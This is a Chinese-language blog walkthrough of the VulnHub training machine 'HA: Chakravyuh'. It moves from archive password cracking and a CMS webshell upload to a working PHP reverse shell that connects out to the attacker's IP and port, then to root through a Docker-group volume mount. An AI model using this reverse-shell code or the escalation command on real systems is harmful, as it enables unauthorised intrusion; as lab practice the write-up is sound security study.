VulnHub靶场学习_HA: Chakravyuh
HA: Chakravyuh
Vulnhub靶场
下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/
背景:
Close your eyes and feel the heat of being in the middle of the Chakravyuh. The Epic Battle formation that is said to uncrackable. Can you crack the Uncrackable? Does it have it in you? Crack this epic Challenge and Claim the Title of Arjuna of 21st Century.
ENUMERATION IS THE KEY!!!!!
端口扫描
发现ftp中存在arjun.7z
扫描路径
MySQL数据库
收集到这些信息后,猜测Getshell的流程是,通过压缩包知道数据库账号密码,数据库拿shell。
所以,先爆破arjun.7z的密码
Fcrackzip这款软件前面的靶机用过,挺好的,但不支持7z
Rarcrack这款软件可以爆破7z,但不能跑字典,遍历太久不现实。
rarcrack arjun.7z --threads 10 --type 7z
最后,我用的是PasswareKit,速度还是挺快的,支持GPU加速,
利用软件本身携带的字典将其破解,压缩包内的txt文本文件。
密码是family。
Base64解密:
gila:admin@gmail.com:princesa
不是数据库的密码。
看看是不是目录,前面的gila
http://192.168.139.140/gila/
http://192.168.139.140/gila/admin
在Themes处有模板选择,点击文件图标能编辑模板文件。
这里能够上传任意文件,上传了个马。
这个马无法解析,因为shell.ph被URL重写,将所有的指向index.php处理。
这里能够获取到数据库的账号密码。
进入数据库。
这里写入路径做了限制,不能直接写入shell,不过可以利用慢日志来获取shell。
同时该cms默认存在phpinfo。一般就是默认的/var/www/html/
但,这里不通过数据库Getshell
通过在index.php中写入反弹shell的代码Getshell
$sock=fsockopen("192.168.139.1",3418);exec("/bin/sh -i <&3 >&3 2>&3");
在PHP中执行如上代码的话,会把系统的标准输入输出重定向到/bin/sh里,导致php-fpm直接502,然后弹的shell也会瞬间掉了。
当系统没有禁用proc_popen的情况下,利用下面代码反弹shell。
$sock = fsockopen('192.168.139.1',3418);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
成功反弹shell。
python -c "import pty;pty.spawn('/bin/bash');"
获取交互式shell
查找提权的点
查找777权限文件
查找suid的文件
在查看id时,发现该用户处于docker组。
可以利用docker提权,大概过程就是建立一个容器,将本机的文件加载其中。
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
详细情况可百度 docker提权。
Cat /root/final.txt
VulnHub靶场学习_HA: Chakravyuh的更多相关文章
- VulnHub靶场学习_HA: ARMOUR
HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...
- VulnHub靶场学习_HA: InfinityStones
HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...
- VulnHub靶场学习_HA: Avengers Arsenal
HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...
- VulnHub靶场学习_HA: Chanakya
HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...
- VulnHub靶场学习_HA: Pandavas
HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...
- VulnHub靶场学习_HA: Natraj
HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...
- VulnHub靶场学习_HA:Forensics
HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- Vulnhub靶场——DC-1
记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...
随机推荐
- 如何将elementUI 表格(el-table)和分页器(el-pagination)连接起来
el-table表格的代码: <template> <el-table :data="tableData" style="width: 100%&quo ...
- python 批量重命名文件名字
import os print(os.path) img_name = os.listdir('./img') for index, temp_name in enumerate(img_name): ...
- 源码分析清楚 AbstractQueuedSynchronizer
本文关注以下几点内容: 深入理解 ReentrantLock 公平锁和非公平锁的区别 深入分析 AbstractQueuedSynchronizer 中的 ConditionObject 深入理解 j ...
- web自动化 -- 切换 iframe
先看源码 switch_to_frame() frame() 具体用法
- vue学习(一)初步了解 vue实例
//html:<div id="app"> <p>{{msg}}<p></div> //script 需要引入jar包vue-2.4 ...
- 关于git的一些简单命令
git简介 1 Git是什么? Git is a free and open source distributed version control system designed to handle ...
- 彻底解决ssh.invoke_shell() 返回的中文问题
上一篇:https://www.cnblogs.com/apff/p/9484939.html(python如何实现普通用户登录服务器后切换到root用户再执行命令遇到的错误解决 ) 接上一篇,前两篇 ...
- pandas_分类与聚合
# 分组与聚合 import pandas as pd import numpy as np # 设置列对齐 pd.set_option("display.unicode.ambiguous ...
- PHP ftp_systype() 函数
定义和用法 ftp_systype() 函数返回 FTP 服务器的系统类型标识符. 如果成功,该函数返回系统类型.如果失败,则返回 FALSE. 语法 ftp_systype(ftp_connecti ...
- 2020牛客暑期多校训练营 第二场 C Cover the Tree 构造 贪心
LINK:Cover the Tree 最受挫的是这道题,以为很简单 当时什么都想不清楚. 先胡了一个树的直径乱搞的贪心 一直过不去.后来意识到这类似于最经典长链剖分优化贪心的做法 然后那个是求最大值 ...